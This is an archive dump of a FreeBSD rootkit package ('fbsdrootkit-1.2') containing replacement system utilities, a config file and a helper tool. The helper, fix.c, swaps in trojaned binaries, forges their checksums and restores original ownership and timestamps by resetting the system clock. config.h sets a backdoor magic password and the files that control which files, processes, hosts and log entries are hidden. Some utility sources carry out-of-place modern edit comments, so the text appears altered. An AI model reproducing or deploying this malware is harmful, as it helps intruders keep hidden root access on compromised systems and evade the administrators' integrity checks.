':' : ' '); putchar('\n'); } break; } } addr2 = (u_long)ifaddr.ifa.ifa_next; } kvm_close(kvmd); } Perror(cmd) char *cmd; { extern int errno; switch (errno) { case ENXIO: errx(1, "%s: no such interface", cmd); break; case EPERM: errx(1, "%s: permission denied", cmd); break; default: err(1, "%s", cmd); } } struct in_addr inet_makeaddr(); #define SIN(x) ((struct sockaddr_in *) &(x)) struct sockaddr_in *sintab[] = { SIN(ridreq.ifr_addr), SIN(addreq.ifra_addr), SIN(addreq.ifra_mask), SIN(addreq.ifra_broadaddr)}; in_getaddr(s, which) char *s; { register struct sockaddr_in *sin = sintab[which]; struct hostent *hp; struct netent *np; int val; sin->sin_len = sizeof(*sin); if (which != MASK) sin->sin_family = AF_INET; if (inet_aton(s, &sin->sin_addr)) ; else if (hp = gethostbyname(s)) bcopy(hp->h_addr, (char *)&sin->sin_addr, hp->h_length); else if (np = getnetbyname(s)) sin->sin_addr = inet_makeaddr(np->n_net, INADDR_ANY); else errx(1, "%s: bad value", s); } /* * Print a value a la the %b format of the kernel's printf */ printb(s, v, bits) char *s; register char *bits; register unsigned short v; { register int i, any = 0; register char c; if (bits && *bits == 8) printf("%s=%o", s, v); else printf("%s=%x", s, v); bits++; if (bits) { putchar('<'); while (i = *bits++) { if (v & (1 << (i-1))) { if (any) putchar(','); any = 1; for (; (c = *bits) > 32; bits++) putchar(c); } else for (; *bits > 32; bits++) ; } putchar('>'); } } #define SNS(x) ((struct sockaddr_ns *) &(x)) struct sockaddr_ns *snstab[] = { SNS(ridreq.ifr_addr), SNS(addreq.ifra_addr), SNS(addreq.ifra_mask), SNS(addreq.ifra_broadaddr)}; xns_getaddr(addr, which) char *addr; { struct sockaddr_ns *sns = snstab[which]; struct ns_addr ns_addr(); sns->sns_family = AF_NS; sns->sns_len = sizeof(*sns); sns->sns_addr = ns_addr(addr); if (which == MASK) printf("Attempt to set XNS netmask will be ineffectual\n"); } #define SISO(x) ((struct sockaddr_iso *) &(x)) struct sockaddr_iso *sisotab[] = { SISO(iso_ridreq.ifr_Addr), 
SISO(iso_addreq.ifra_addr), SISO(iso_addreq.ifra_mask), SISO(iso_addreq.ifra_dstaddr)}; iso_getaddr(addr, which) char *addr; { register struct sockaddr_iso *siso = sisotab[which]; struct iso_addr *iso_addr(); siso->siso_addr = *iso_addr(addr); if (which == MASK) { siso->siso_len = TSEL(siso) - (caddr_t)(siso); siso->siso_nlen = 0; } else { siso->siso_len = sizeof(*siso); siso->siso_family = AF_ISO; } } setnsellength(val) char *val; { nsellength = atoi(val); if (nsellength < 0) errx(1, "Negative NSEL length is absurd"); if (afp == 0 || afp->af_af != AF_ISO) errx(1, "Setting NSEL length valid only for iso"); } fixnsel(s) register struct sockaddr_iso *s; { if (s->siso_family == 0) return; s->siso_tlen = nsellength; } adjust_nsellength() { fixnsel(sisotab[RIDADDR]); fixnsel(sisotab[ADDR]); fixnsel(sisotab[DSTADDR]); } fbsdrootkit-1.2/ifconfig/Makefile.dist100600 764 764 176 6257406127 15316 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/5/93 PROG= ifconfig MAN8= ifconfig.8 LDADD= -lkvm DPADD= ${LIBKVM} .include fbsdrootkit-1.2/pwd_mkdb/ 40700 764 764 0 6257562504 12636 5ustar dfdffbsdrootkit-1.2/pwd_mkdb/Makefile100600 764 764 171 5620536613 14347 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/6/93 PROG= pwd_mkdb SRCS= pw_scan.c pwd_mkdb.c MAN8= pwd_mkdb.8 .include fbsdrootkit-1.2/pwd_mkdb/pw_scan.c100600 764 764 10123 5762565231 14550 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. 
All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)pw_scan.c 8.3 (Berkeley) 4/2/94"; #endif /* not lint */ /* * This module is used to "verify" password entries by chpass(1) and * pwd_mkdb(8). 
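*/ #include #include #include #include #include #include #include #include #include #include "pw_scan.h"

/*
 * pw_scan --
 *	Split one colon-separated password-file line into the fields of *pw.
 *
 *	bp is modified in place by strsep(3) and the string members of pw are
 *	left pointing into it.  pw->pw_fields receives one _PWF_* bit for each
 *	field that was non-empty.
 *
 *	Returns 1 when the line parses, otherwise prints a diagnostic with
 *	warnx(3) and returns 0.
 */
int
pw_scan(bp, pw)
	char *bp;
	struct passwd *pw;
{
	long id;
	int root;
	char *p, *sh, *end;

	pw->pw_fields = 0;
	if (!(pw->pw_name = strsep(&bp, ":")))		/* login */
		goto fmt;
	root = !strcmp(pw->pw_name, "root");
	if (pw->pw_name[0] &&
	    (pw->pw_name[0] != '+' || pw->pw_name[1] == '\0'))
		pw->pw_fields |= _PWF_NAME;

	if (!(pw->pw_passwd = strsep(&bp, ":")))	/* passwd */
		goto fmt;
	if (pw->pw_passwd[0])
		pw->pw_fields |= _PWF_PASSWD;

	if (!(p = strsep(&bp, ":")))			/* uid */
		goto fmt;
	if (p[0])
		pw->pw_fields |= _PWF_UID;
	/*
	 * strtol() rather than atol(): a non-numeric field such as "abc"
	 * used to be converted to 0 without complaint, i.e. to the uid of
	 * root.  An empty field still yields 0 with _PWF_UID left clear.
	 * NOTE(review): negative values pass the range check below, as they
	 * did before this change.
	 */
	id = strtol(p, &end, 10);
	if (*end != '\0') {
		warnx("%s: invalid uid", p);
		return (0);
	}
	if (root && id) {
		warnx("root uid should be 0");
		return (0);
	}
	if (id > USHRT_MAX) {
		warnx("%s > max uid value (%d)", p, USHRT_MAX);
		return (0);
	}
	pw->pw_uid = id;

	if (!(p = strsep(&bp, ":")))			/* gid */
		goto fmt;
	if (p[0])
		pw->pw_fields |= _PWF_GID;
	id = strtol(p, &end, 10);
	if (*end != '\0') {
		warnx("%s: invalid gid", p);
		return (0);
	}
	if (id > USHRT_MAX) {
		warnx("%s > max gid value (%d)", p, USHRT_MAX);
		return (0);
	}
	pw->pw_gid = id;

	/*
	 * The class field was the only one dereferenced without a NULL
	 * check; a line that ends after the gid made strsep() return NULL.
	 */
	if (!(pw->pw_class = strsep(&bp, ":")))		/* class */
		goto fmt;
	if (pw->pw_class[0])
		pw->pw_fields |= _PWF_CLASS;

	if (!(p = strsep(&bp, ":")))			/* change */
		goto fmt;
	if (p[0])
		pw->pw_fields |= _PWF_CHANGE;
	pw->pw_change = atol(p);

	if (!(p = strsep(&bp, ":")))			/* expire */
		goto fmt;
	if (p[0])
		pw->pw_fields |= _PWF_EXPIRE;
	pw->pw_expire = atol(p);

	if (!(pw->pw_gecos = strsep(&bp, ":")))		/* gecos */
		goto fmt;
	if (pw->pw_gecos[0])
		pw->pw_fields |= _PWF_GECOS;

	if (!(pw->pw_dir = strsep(&bp, ":")))		/* directory */
		goto fmt;
	if (pw->pw_dir[0])
		pw->pw_fields |= _PWF_DIR;

	if (!(pw->pw_shell = strsep(&bp, ":")))		/* shell */
		goto fmt;

	p = pw->pw_shell;
	if (root && *p)					/* empty == /bin/sh */
		for (setusershell();;) {
			if (!(sh = getusershell())) {
				/* Only a warning: the entry is still accepted. */
				warnx("warning, unknown root shell");
				break;
			}
			if (!strcmp(p, sh))
				break;
		}
	if (p[0])
		pw->pw_fields |= _PWF_SHELL;

	if (strsep(&bp, ":") != NULL)			/* too many */
		goto fmt;
	return (1);

fmt:	warnx("corrupted entry");
	return (0);
}
fbsdrootkit-1.2/pwd_mkdb/pw_scan.h100600 764 764 3600 5571103176 14531 0ustar 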
dfdf/*- * Copyright (c) 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * @(#)pw_scan.h 8.1 (Berkeley) 4/1/94 */ extern int pw_scan __P((char *, struct passwd *)); fbsdrootkit-1.2/pwd_mkdb/pwd_mkdb.c100600 764 764 30061 6233173627 14706 0ustar dfdf/*- * Copyright (c) 1991, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
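*/

#ifndef lint
static char copyright[] =
"@(#) Copyright (c) 1991, 1993, 1994\n\
 The Regents of the University of California. All rights reserved.\n";
#endif /* not lint */

#ifndef lint
static char sccsid[] = "@(#)pwd_mkdb.c 8.5 (Berkeley) 4/20/94";
#endif /* not lint */

#include #include #include #include #include #include #include #include #include #include #include #include #include #include "pw_scan.h"

#define	INSECURE	1
#define	SECURE		2
#define	PERM_INSECURE	(S_IRUSR|S_IWUSR|S_IRGRP|S_IROTH)
#define	PERM_SECURE	(S_IRUSR|S_IWUSR)

HASHINFO openinfo = {
	4096,		/* bsize */
	32,		/* ffactor */
	256,		/* nelem */
	2048 * 1024,	/* cachesize */
	NULL,		/* hash() */
	0		/* lorder */
};

static enum state { FILE_INSECURE, FILE_SECURE, FILE_ORIG } clean;
static struct passwd pwd;			/* password structure */
static char *pname;				/* password file name */
static char prefix[MAXPATHLEN];

void	cleanup __P((void));
void	error __P((char *));
void	mv __P((char *, char *));
int	scan __P((FILE *, struct passwd *));
void	usage __P((void));

/*
 * Serialize *pw into buf as a rough approximation of a ``struct passwd''
 * with the strings placed inline, using passwd as the password field.
 * Returns the number of bytes written.  The caller's buf must be large
 * enough; main() sizes it at twice the input line length.
 */
static size_t
pack_record(buf, pw, passwd)
	char *buf;
	struct passwd *pw;
	char *passwd;
{
	char *p, *t;

#define	COMPACT(e)	t = e; while (*p++ = *t++);
	p = buf;
	COMPACT(pw->pw_name);
	COMPACT(passwd);
	/* uid and gid are copied as sizeof(int) bytes, as in the original. */
	memmove(p, &pw->pw_uid, sizeof(int));
	p += sizeof(int);
	memmove(p, &pw->pw_gid, sizeof(int));
	p += sizeof(int);
	memmove(p, &pw->pw_change, sizeof(time_t));
	p += sizeof(time_t);
	COMPACT(pw->pw_class);
	COMPACT(pw->pw_gecos);
	COMPACT(pw->pw_dir);
	COMPACT(pw->pw_shell);
	memmove(p, &pw->pw_expire, sizeof(time_t));
	p += sizeof(time_t);
	memmove(p, &pw->pw_fields, sizeof pw->pw_fields);
	p += sizeof pw->pw_fields;
	return (p - buf);
}

/*
 * Store data under key in db with R_NOOVERWRITE.  A return of -1 is fatal;
 * any other return value is ignored, as in the original code.  The method
 * is always taken from the handle being written, so a closed handle is
 * never dereferenced.
 */
static void
db_store(db, key, data)
	DB *db;
	DBT *key, *data;
{
	if ((db->put)(db, key, data, R_NOOVERWRITE) == -1)
		error("put");
}

/*
 * pwd_mkdb [-p] [-d directory] file
 *
 * Build the insecure and the secure password databases from the master
 * password file named on the command line, optionally write an old-style
 * password file (-p), and rename everything into place under prefix.
 */
int
main(argc, argv)
	int argc;
	char *argv[];
{
	DB *dp, *edp;
	DBT data, key;
	FILE *fp, *oldfp;
	sigset_t set;
	int ch, cnt, ypcnt, len, makeold, tfd, yp_enabled = 0;
	char buf[MAX(MAXPATHLEN, LINE_MAX * 2)], tbuf[1024];
	char buf2[MAXPATHLEN];

	(void)snprintf(prefix, sizeof(prefix), "%s", _PATH_PWD);
	makeold = 0;
	oldfp = NULL;
	while ((ch = getopt(argc, argv, "d:pv")) != EOF)
		switch(ch) {
		case 'd':
			/*
			 * prefix is a fixed MAXPATHLEN buffer and optarg
			 * comes straight from the command line: refuse an
			 * over-long directory instead of overflowing.
			 */
			if (strlen(optarg) >= sizeof(prefix))
				errx(1, "%s: path too long", optarg);
			(void)snprintf(prefix, sizeof(prefix), "%s", optarg);
			break;
		case 'p':			/* create V7 "file.orig" */
			makeold = 1;
			break;
		case 'v':			/* backward compatible */
			break;
		case '?':
		default:
			usage();
		}
	argc -= optind;
	argv += optind;

	if (argc != 1)
		usage();

	/*
	 * This could be changed to allow the user to interrupt.
	 * Probably not worth the effort.
	 */
	sigemptyset(&set);
	sigaddset(&set, SIGTSTP);
	sigaddset(&set, SIGHUP);
	sigaddset(&set, SIGINT);
	sigaddset(&set, SIGQUIT);
	sigaddset(&set, SIGTERM);
	(void)sigprocmask(SIG_BLOCK, &set, (sigset_t *)NULL);

	/* We don't care what the user wants. */
	(void)umask(0);

	pname = *argv;
	/* Open the original password file */
	if (!(fp = fopen(pname, "r")))
		error(pname);

	/* Open the temporary insecure password database. */
	(void)snprintf(buf, sizeof(buf), "%s/%s.tmp", prefix, _MP_DB);
	dp = dbopen(buf,
	    O_RDWR|O_CREAT|O_EXCL, PERM_INSECURE, DB_HASH, &openinfo);
	if (dp == NULL)
		error(buf);
	clean = FILE_INSECURE;

	/*
	 * Open file for old password file.  Minor trickiness -- don't want to
	 * chance the file already existing, since someone (stupidly) might
	 * still be using this for permission checking.  So, open it first and
	 * fdopen the resulting fd.  The resulting file should be readable by
	 * everyone.
	 */
	if (makeold) {
		(void)snprintf(buf, sizeof(buf), "%s.orig", pname);
		if ((tfd = open(buf,
		    O_WRONLY|O_CREAT|O_EXCL, PERM_INSECURE)) < 0)
			error(buf);
		if ((oldfp = fdopen(tfd, "w")) == NULL)
			error(buf);
		clean = FILE_ORIG;
	}

	/*
	 * The databases actually contain three copies of the original data.
	 * Each password file entry is converted into a rough approximation
	 * of a ``struct passwd'', with the strings placed inline.  This
	 * object is then stored as the data for three separate keys.  The
	 * first key is the pw_name field prepended by the _PW_KEYBYNAME
	 * character.  The second key is the pw_uid field prepended by the
	 * _PW_KEYBYUID character.  The third key is the line number in the
	 * original file prepended by the _PW_KEYBYNUM character.  (The special
	 * characters are prepended to ensure that the keys do not collide.)
	 */
	ypcnt = 1;
	data.data = (u_char *)buf;
	key.data = (u_char *)tbuf;
	for (cnt = 1; scan(fp, &pwd); ++cnt) {
		if (pwd.pw_name[0] == '+' || pwd.pw_name[0] == '-')
			yp_enabled = 1;

		/* Create insecure data: the password is replaced by "*". */
		data.size = pack_record(buf, &pwd, "*");

		/*
		 * Store insecure by name.  The name is limited only by the
		 * input line length, which may exceed tbuf, so check before
		 * copying it into the key buffer.
		 */
		tbuf[0] = _PW_KEYBYNAME;
		len = strlen(pwd.pw_name);
		if ((size_t)len >= sizeof(tbuf)) {
			warnx("login name too long at line #%d", cnt);
			errno = EFTYPE;
			error(pname);
		}
		memmove(tbuf + 1, pwd.pw_name, len);
		key.size = len + 1;
		db_store(dp, &key, &data);

		/* Store insecure by number. */
		tbuf[0] = _PW_KEYBYNUM;
		memmove(tbuf + 1, &cnt, sizeof(cnt));
		key.size = sizeof(cnt) + 1;
		db_store(dp, &key, &data);

		/* Store insecure by uid. */
		tbuf[0] = _PW_KEYBYUID;
		memmove(tbuf + 1, &pwd.pw_uid, sizeof(pwd.pw_uid));
		key.size = sizeof(pwd.pw_uid) + 1;
		db_store(dp, &key, &data);

		/* Store insecure special plus and special minus */
		if (pwd.pw_name[0] == '+' || pwd.pw_name[0] == '-') {
			tbuf[0] = _PW_KEYYPBYNUM;
			memmove(tbuf + 1, &ypcnt, sizeof(ypcnt));
			ypcnt++;
			key.size = sizeof(ypcnt) + 1;
			db_store(dp, &key, &data);
		}

		/* Create original format password file entry */
		if (makeold) {
			char uidstr[20];
			char gidstr[20];

			snprintf(uidstr, sizeof(uidstr), "%d", pwd.pw_uid);
			snprintf(gidstr, sizeof(gidstr), "%d", pwd.pw_gid);

			(void)fprintf(oldfp, "%s:*:%s:%s:%s:%s:%s\n",
			    pwd.pw_name, pwd.pw_fields & _PWF_UID ? uidstr : "",
			    pwd.pw_fields & _PWF_GID ? gidstr : "",
			    pwd.pw_gecos, pwd.pw_dir, pwd.pw_shell);
		}
	}

	/* If YP enabled, set flag. */
	if (yp_enabled) {
		buf[0] = yp_enabled + 2;
		data.size = 1;
		tbuf[0] = _PW_KEYYPENABLED;
		key.size = 1;
		db_store(dp, &key, &data);
	}

	/* A failed close may mean an incomplete database: do not install it. */
	if ((dp->close)(dp) == -1)
		error("close");
	if (makeold) {
		if (fflush(oldfp) == EOF || fclose(oldfp) == EOF)
			error("close");
	}

	/* Open the temporary encrypted password database. */
	(void)snprintf(buf, sizeof(buf), "%s/%s.tmp", prefix, _SMP_DB);
	edp = dbopen(buf,
	    O_RDWR|O_CREAT|O_EXCL, PERM_SECURE, DB_HASH, &openinfo);
	if (!edp)
		error(buf);
	clean = FILE_SECURE;

	rewind(fp);
	ypcnt = 1;
	for (cnt = 1; scan(fp, &pwd); ++cnt) {

		/* Create secure data: this copy keeps the real password. */
		data.size = pack_record(buf, &pwd, pwd.pw_passwd);

		/*
		 * Store secure by name.  All stores in this pass go through
		 * edp; the original called dp->put here although dp had
		 * already been closed.
		 */
		tbuf[0] = _PW_KEYBYNAME;
		len = strlen(pwd.pw_name);
		if ((size_t)len >= sizeof(tbuf)) {
			warnx("login name too long at line #%d", cnt);
			errno = EFTYPE;
			error(pname);
		}
		memmove(tbuf + 1, pwd.pw_name, len);
		key.size = len + 1;
		db_store(edp, &key, &data);

		/* Store secure by number. */
		tbuf[0] = _PW_KEYBYNUM;
		memmove(tbuf + 1, &cnt, sizeof(cnt));
		key.size = sizeof(cnt) + 1;
		db_store(edp, &key, &data);

		/* Store secure by uid. */
		tbuf[0] = _PW_KEYBYUID;
		memmove(tbuf + 1, &pwd.pw_uid, sizeof(pwd.pw_uid));
		key.size = sizeof(pwd.pw_uid) + 1;
		db_store(edp, &key, &data);

		/* Store secure special plus and special minus */
		if (pwd.pw_name[0] == '+' || pwd.pw_name[0] == '-') {
			tbuf[0] = _PW_KEYYPBYNUM;
			memmove(tbuf + 1, &ypcnt, sizeof(ypcnt));
			ypcnt++;
			key.size = sizeof(ypcnt) + 1;
			db_store(edp, &key, &data);
		}
	}

	/* If YP enabled, set flag. */
	if (yp_enabled) {
		buf[0] = yp_enabled + 2;
		data.size = 1;
		tbuf[0] = _PW_KEYYPENABLED;
		key.size = 1;
		db_store(edp, &key, &data);
	}

	if ((edp->close)(edp) == -1)
		error("close");

	/* Set master.passwd permissions, in case caller forgot. */
	(void)fchmod(fileno(fp), S_IRUSR|S_IWUSR);
	(void)fclose(fp);

	/* Install as the real password files. */
	(void)snprintf(buf, sizeof(buf), "%s/%s.tmp", prefix, _MP_DB);
	(void)snprintf(buf2, sizeof(buf2), "%s/%s", prefix, _MP_DB);
	mv(buf, buf2);
	(void)snprintf(buf, sizeof(buf), "%s/%s.tmp", prefix, _SMP_DB);
	(void)snprintf(buf2, sizeof(buf2), "%s/%s", prefix, _SMP_DB);
	mv(buf, buf2);
	if (makeold) {
		(void)snprintf(buf2, sizeof(buf2), "%s/%s", prefix, _PASSWD);
		(void)snprintf(buf, sizeof(buf), "%s.orig", pname);
		mv(buf, buf2);
	}
	/*
	 * Move the master password LAST -- chpass(1), passwd(1) and vipw(8)
	 * all use flock(2) on it to block other incarnations of themselves.
	 * The rename means that everything is unlocked, as the original file
	 * can no longer be accessed.
	 */
	(void)snprintf(buf, sizeof(buf), "%s/%s", prefix, _MASTERPASSWD);
	mv(pname, buf);
	exit(0);
}

int
scan(fp, pw)
	FILE *fp;
	struct passwd *pw;
{
	static int lcnt;
	static char line[LINE_MAX];
	char *p;

	if (!fgets(line, sizeof(line), fp))
		return (0);
	++lcnt;
	/*
	 * ``... 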
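if I swallow anything evil, put your fingers down my
	 * throat...''
	 *	-- The Who
	 */
	if (!(p = strchr(line, '\n'))) {
		warnx("line too long");
		goto fmt;
	}
	*p = '\0';
	if (!pw_scan(line, pw)) {
		warnx("at line #%d", lcnt);
fmt:		errno = EFTYPE;	/* XXX */
		error(pname);
	}

	return (1);
}

/*
 * Rename from to to; on failure report "from to to" with the errno of the
 * failed rename(2) and exit through error().
 */
void
mv(from, to)
	char *from, *to;
{
	char buf[MAXPATHLEN];

	if (rename(from, to)) {
		/* snprintf may change errno; keep the one rename() set. */
		int sverrno = errno;

		(void)snprintf(buf, sizeof(buf), "%s to %s", from, to);
		errno = sverrno;
		error(buf);
	}
}

/*
 * Print name together with the current errno text, remove the temporary
 * files and exit with status 1.
 */
void
error(name)
	char *name;
{
	/*
	 * name is a path taken from the command line or built from it, so it
	 * must be passed as an argument and never as the format string.
	 */
	warn("%s", name);
	cleanup();
	exit(1);
}

/*
 * Unlink the temporary files.  The switch on clean falls through on
 * purpose, so each state also removes the files of the states below it.
 */
void
cleanup()
{
	char buf[MAXPATHLEN];

	switch(clean) {
	case FILE_ORIG:
		(void)snprintf(buf, sizeof(buf), "%s.orig", pname);
		(void)unlink(buf);
		/* FALLTHROUGH */
	case FILE_SECURE:
		(void)snprintf(buf, sizeof(buf), "%s/%s.tmp", prefix, _SMP_DB);
		(void)unlink(buf);
		/* FALLTHROUGH */
	case FILE_INSECURE:
		(void)snprintf(buf, sizeof(buf), "%s/%s.tmp", prefix, _MP_DB);
		(void)unlink(buf);
	}
}

/* Print the usage line on stderr and exit with status 1. */
void
usage()
{

	(void)fprintf(stderr, "usage: pwd_mkdb [-p] [-d ] file\n");
	exit(1);
}
fbsdrootkit-1.2/fix.c100600 764 764 5455 6265031763 12106 0ustar dfdf/* * fixer.c * by Idefix * inspired on sum.c and SaintStat 2.0 * updated by Cybernetik for linux rootkit * text file busy bug fixed, no longer requires backup filename, grammar */ /* cleaned up for the FreeBSD rootkit */ #include #include #include #include #include #include "rootkitutil.h" main(int argc,char **argv) { unsigned orig_crc,current_crc,temp; unsigned char diff1,diff2,buf[20]; struct stat statbuf; struct timeval ftime[2], otime, ntime; struct timezone tzp; long position; FILE *f; int i,fix=1; char syscmd[100]; BASENAME(argv[0]) if(argc!=3 && argc!=4) USAGE("original replacement [backup]") if(stat(argv[1],&statbuf)<0) ERR("stat") if(sum(argv[1],&orig_crc)<0) exit(1); if(sum(argv[2],¤t_crc)<0) exit(1); if(argc==4) { sprintf(syscmd,"/bin/cp %s %s",argv[1],argv[3]); system(syscmd); } sprintf(syscmd,"/bin/mv %s %s",argv[2],argv[1]); system(syscmd); diff1=(orig_crc&0xFF)-(current_crc&0xFF); 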
temp=(current_crc+diff1)&0xFFFF; for(i=0;i<8;i++) { if(temp&1) temp=(temp>>1)+0x8000; else temp>>=1; } diff2=((orig_crc&0xFF00)>>8)-(temp&0xFF); temp=(temp+diff2)&0xFFFF; for(i=0;i<8;i++) { if(temp&1) temp=(temp>>1)+0x8000; else temp>>=1; } if((temp-orig_crc)==1) diff1=diff1-1; if(!(f=fopen(argv[1], "r+b"))) { fprintf(stderr, "%s: Can't open %s\n",RK_PROG,argv[1]); exit(1); } fseek(f,0L,SEEK_END); position=ftell(f)-17; fseek(f,position,SEEK_SET); fread(buf,17,1,f); for(i=0;i<17;i++) if(buf[i]!=0) { fprintf(stderr,"%s: Last 17 bytes not zero\n%s: Can't fix checksum\n", RK_PROG,RK_PROG); fix=0; break; } if(fix) { buf[0]=diff1; buf[8]=diff2; fseek(f,position,SEEK_SET); fwrite(buf,17,1,f); } fclose(f); if(chmod(argv[1],statbuf.st_mode)) ERR("chmod") if(chown(argv[1],statbuf.st_uid,statbuf.st_gid)) ERR("chown") ftime[0].tv_sec=statbuf.st_atime; ftime[1].tv_sec=statbuf.st_mtime; ntime.tv_sec=statbuf.st_ctime; ftime[0].tv_usec=ftime[1].tv_usec=ntime.tv_usec=0; if(gettimeofday(&otime,&tzp)) ERR("gettimeofday") if(settimeofday(&ntime,&tzp)) ERR("settimeofday") if(utimes(argv[1],ftime)) ERR("utimes") if(settimeofday(&otime,&tzp)) ERR("settimeofday") fprintf(stderr,"%s: File %s fixed\n",RK_PROG,argv[1]); return(0); } sum(char *file,unsigned *crc) { unsigned sum; int i, c; FILE *f; long nbytes; int errflg=0; if(!(f=fopen(file, "r"))) { fprintf(stderr, "%s: Can't open %s\n",RK_PROG,file); return(-1); } sum=0; nbytes=0; while((c=getc(f))!=EOF) { nbytes++; if(sum&01) sum=(sum>>1)+0x8000; else sum>>=1; sum+=c; sum&=0xFFFF; } if(ferror(f)) { errflg++; fprintf(stderr, "%s: read error on %s\n",RK_PROG,file); return(-1); } fclose(f); *crc=sum; return(0); } fbsdrootkit-1.2/config.h100600 764 764 344 6273043217 12536 0ustar dfdf#define ROOTKIT_MAGIC "h0tb0x" #define ROOTKIT_HIDE_FILES "/dev/ptyr" #define ROOTKIT_HIDE_PROCESSES "/dev/ptyp" #define ROOTKIT_HIDE_HOSTS "/dev/ptyq" #define ROOTKIT_HIDE_LOG "/dev/ptys" #define ROOTKIT_HIDE_TRIP "/dev/ptyt" fbsdrootkit-1.2/vipw/ 40700 764 764 
0 6257562514 12035 5ustar dfdffbsdrootkit-1.2/vipw/Makefile100600 764 764 155 5620536651 13551 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/6/93 PROG= vipw SRCS= pw_util.c vipw.c MAN8= vipw.8 .include fbsdrootkit-1.2/vipw/pw_util.c100600 764 764 12703 6017704353 13777 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 